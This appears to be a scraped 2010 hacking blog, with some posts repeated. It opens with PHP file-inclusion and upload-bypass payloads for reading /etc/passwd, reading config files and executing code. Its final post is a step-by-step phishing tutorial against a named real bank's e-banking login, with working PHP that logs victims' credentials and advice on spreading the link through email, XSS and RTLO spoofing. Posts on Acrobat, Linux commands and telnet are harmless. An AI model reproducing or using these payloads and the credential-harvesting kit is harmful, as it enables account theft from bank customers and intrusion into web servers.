Directory listing with nullbyte injection only for FreeBSD (afaik) and magic quotes off
test.php?page=../../../../home/
PHP stream/wrappers inclusion
test.php?page=php://filter/convert.base64-encode/resource=config.php
Path Truncation inclusion
test.php?page=../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
With more details on this, http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
Apache Log injection
test.php?page=../logs/access.log
You'll have to find the location of the log in order to include it. Also you should try including everything you can such as the session files, uploaded files, etc. For the apache log injection, you'll have to telnet and send the GET request for arbitrary PHP code like Get / Few apache log locations to try are as below:
Useragent
test.php?page=../../../../../../../proc/self/environ
Set your useragent to some php code and it will get executed if you are able to include the /proc/self/environ file.
Check existence of folder:
test.php?page=../../../../../folder/you/guess/../../../../../etc/passwd
Here the trick is basically using the path traversal method.
File upload:
Nullbyte injection: If only valid extensions(such as jpg, gif) are allowed, we can rename our shell to shell.php.jpg which will bypass the file upload security check.
PHP code within image: Sometimes the uploads are not checked for the file extension but for dimensions of images. This again can be bypassed by injecting PHP codes in the valid images and renaming them to .php file. The tool named edjpgcom can be used in order to inject the PHP code as JPEG comments in the images.
Header bypass: Again sometimes the developer just relies on the header information that contains the type of the file like “image/jpeg” for jpeg image. But since this is passed from client side, it can be modified using the tools such as tamper data or live http headers.
Also, the file upload feature can be exploited in union with the file inclusion vulnerability. If you have a site vulnerable to the file inclusion but not vulnerable to the insecure file upload, you can upload valid image as said in second method here and then you can include that file with the file inclusion vulnerable PHP script.
As said earlier, this article is not about giving you every steps of how to exploit the web vulnerabilities.
Read more...
Bookmark this post: |
|
Wednesday, 1 December 2010
Speeding up opening of Acrobat Reader
Whenever you launch acrobat reader, it takes some extra times while loading the plugins and we rarely use those plugins(In fact, I rarely use them) so we can speed up the opening of acrobat reader.
The trick in speeding up the process of opening acrobat reader is by removing the plugins from plugins folder and putting them in the folder called optional. First, go to the acrobat reader installation directory which will be probably located somewhere at
There, you will see the folder called plugins. What you have to do is cut and paste all the items from plugins folder to optional folder. Make sure that you are not locking any of those files by opening the acrobat reader while doing cut/paste. Hope this helps you. :)
Read more...
The trick in speeding up the process of opening acrobat reader is by removing the plugins from plugins folder and putting them in the folder called optional. First, go to the acrobat reader installation directory which will be probably located somewhere at
C:\program files\adobe\
There, you will see the folder called plugins. What you have to do is cut and paste all the items from plugins folder to optional folder. Make sure that you are not locking any of those files by opening the acrobat reader while doing cut/paste. Hope this helps you. :)
Read more...
Bookmark this post: |
|
Tuesday, 23 November 2010
Some useful linux commands
This page lists some of the useful linux commands you might need to be using frequently. This is however not the complete list of the commands, rather I'd try to post more and more useful linux commands here.
gksudo command/program - run the visual sudo and start the specified command/program with elevated privilege.
sudo command - run the command with elevated privilege.
ps -A | grep -i your_program_name - ps gives the snapshot of the current running processes and this can be quite useful to view the running program's PID to use with kill command.
kill pid - this will kill the target program by using PID. you might need to use sudo version sometimes if the running program was not run by the current user.
ifconfig - display the network interface information. iwconfig is the similar tool for the wireless device.
ufw enable/disable - enable or disable the firewall.
uname -a - get every information about your linux kernel.
sudo dpkg --configure -a - configure and repair the broken package.
I'll be updating this list with any commands I happen to remember.
Read more...
gksudo command/program - run the visual sudo and start the specified command/program with elevated privilege.
sudo command - run the command with elevated privilege.
ps -A | grep -i your_program_name - ps gives the snapshot of the current running processes and this can be quite useful to view the running program's PID to use with kill command.
kill pid - this will kill the target program by using PID. you might need to use sudo version sometimes if the running program was not run by the current user.
ifconfig - display the network interface information. iwconfig is the similar tool for the wireless device.
ufw enable/disable - enable or disable the firewall.
uname -a - get every information about your linux kernel.
sudo dpkg --configure -a - configure and repair the broken package.
I'll be updating this list with any commands I happen to remember.
Read more...
Bookmark this post: |
|
Sunday, 21 November 2010
Enabling telnet in windows 7
AYesterday when I was on my saturday class in kathmandu, I needed to use telnet in order to find the ssh version of some server as the part of recon challenge for my friend. But I found that the windows 7 by default has no telnet client. After returning to KU, I played around with my friends laptop to find the way to enable telnet client.
Just go to the control panel and choose the programs and features option.
There, you'll find the option Turn Windows features on or off.
Check the telnet client and hit Ok.
Now you can use the telnet client in your windows 7. Have fun.
Read more...
Just go to the control panel and choose the programs and features option.
There, you'll find the option Turn Windows features on or off.
Check the telnet client and hit Ok.
Now you can use the telnet client in your windows 7. Have fun.
Read more...
Bookmark this post: |
|
Wednesday, 13 October 2010
Making a fake login page [tutorial on phishers for beginners]
This tutorial will give you basic idea of what phishers are and how to create a simple phisher. Please be sure to comment on this post.
A phisher is a fake login page used to gain access to someones account. When someone logs into
the fake login page, there password is sent to you in some way such as by email or by writing to the files in the webserver. The major attacks of the phishing are the email accounts and e-commerce sites so this method is widely used to steal the critical information from the users.
Now, I'll show you how to make a successful phisher by giving an example by creating the phishing page of e-Banking of Nepal Investment Bank Limited.
a) We open the login page of our target site and save the page in our HDD by going to File->Save As from Firefox.
b) You'll have a HTML page and the folder containing the required images, css and javascript files for the HTML page.
c) Create a file like passes.txt or whatever where you'll store all the passwords from the phishing page. Note that you'll have to chmod this file to writable(like chmod a+w filename or chmod 777 filename according to the permission you want).
d) Now create a PHP file called phisher.php and paste the code below:
e) Your phishing PHP script is ready. Now time for editing the HTML source of your target login page. Open the HTML source in text editor and search for the text <form in my case(&usually) and in the action field specify the name of your PHP script like:
f) Now, our phisher is ready and all you have to do is upload the phisher.php and the HTML source and its related folder to free webhosting (I use t35.com). Be sure to create passes.txt and set proper permission in the webserver.
g) Now, all you have to do is send the link of your phisher to the users by emailing, forum boards, XSS methods or by RTLO spoofing or any other method you can work creatively.
Now, if you want to stop these phishers, you might want to submit the phisher links you find on the internet to www.phishtank.com.
I hope you learn something from this phishing tutorial. Have fun. :)
Read more...
A phisher is a fake login page used to gain access to someones account. When someone logs into
the fake login page, there password is sent to you in some way such as by email or by writing to the files in the webserver. The major attacks of the phishing are the email accounts and e-commerce sites so this method is widely used to steal the critical information from the users.
Now, I'll show you how to make a successful phisher by giving an example by creating the phishing page of e-Banking of Nepal Investment Bank Limited.
a) We open the login page of our target site and save the page in our HDD by going to File->Save As from Firefox.
b) You'll have a HTML page and the folder containing the required images, css and javascript files for the HTML page.
c) Create a file like passes.txt or whatever where you'll store all the passwords from the phishing page. Note that you'll have to chmod this file to writable(like chmod a+w filename or chmod 777 filename according to the permission you want).
d) Now create a PHP file called phisher.php and paste the code below:
<?php
header("location:https://www.nibl.com.np/BankAwayRetail/sgonHttpHandler.aspx?Action.RetUser.Init.001=Y&AppSignonBankId=004&AppType=retail");
$fp = fopen("passes.txt","a");
foreach ($_REQUEST as $var => $val)
{
fwrite($fp, $var." = ".$val."\r\n");
}
fwrite($fp,"\r\n");
fclose($fp);
?>
header("location:https://www.nibl.com.np/BankAwayRetail/sgonHttpHandler.aspx?Action.RetUser.Init.001=Y&AppSignonBankId=004&AppType=retail");
$fp = fopen("passes.txt","a");
foreach ($_REQUEST as $var => $val)
{
fwrite($fp, $var." = ".$val."\r\n");
}
fwrite($fp,"\r\n");
fclose($fp);
?>
e) Your phishing PHP script is ready. Now time for editing the HTML source of your target login page. Open the HTML source in text editor and search for the text <form in my case(&usually) and in the action field specify the name of your PHP script like:
<form action="phisher.php" method="POST" name="RetailSignOn">
f) Now, our phisher is ready and all you have to do is upload the phisher.php and the HTML source and its related folder to free webhosting (I use t35.com). Be sure to create passes.txt and set proper permission in the webserver.
g) Now, all you have to do is send the link of your phisher to the users by emailing, forum boards, XSS methods or by RTLO spoofing or any other method you can work creatively.
Now, if you want to stop these phishers, you might want to submit the phisher links you find on the internet to www.phishtank.com.
I hope you learn something from this phishing tutorial. Have fun. :)
Read more...
Bookmark this post: |
|
Subscribe to:
Posts (Atom)